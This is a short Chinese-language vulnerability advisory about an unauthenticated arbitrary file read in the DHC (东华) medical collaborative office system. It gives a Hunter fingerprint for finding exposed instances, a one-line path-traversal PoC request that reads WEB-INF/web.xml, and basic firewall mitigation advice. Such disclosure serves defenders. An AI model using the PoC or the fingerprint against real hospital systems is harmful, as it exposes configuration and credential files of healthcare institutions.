0x00 免责声明
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
0x01 产品简介
东华医疗协同办公系统是一种专为医疗机构设计的协同办公解决方案。该系统旨在提升医疗机构内部的工作效率和沟通协作能力,促进医务人员之间的信息共享和协同工作。
Ox02 漏洞概述
东华医疗协同办公系统 templateFie 存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x03 资产测绘
Hunter:web.body="/skin/charmBlue/css/dialog.css"
0x04 漏洞复现
PoC:
GET /common/templateFile?template_name=../../WEB-INF/web.xml HTTP/1.1
0x05 修复建议
临时修复方案:
通过防火墙等安全设备设置访问策略,设置白名单访问。
如非必要,禁止公网访问该系统。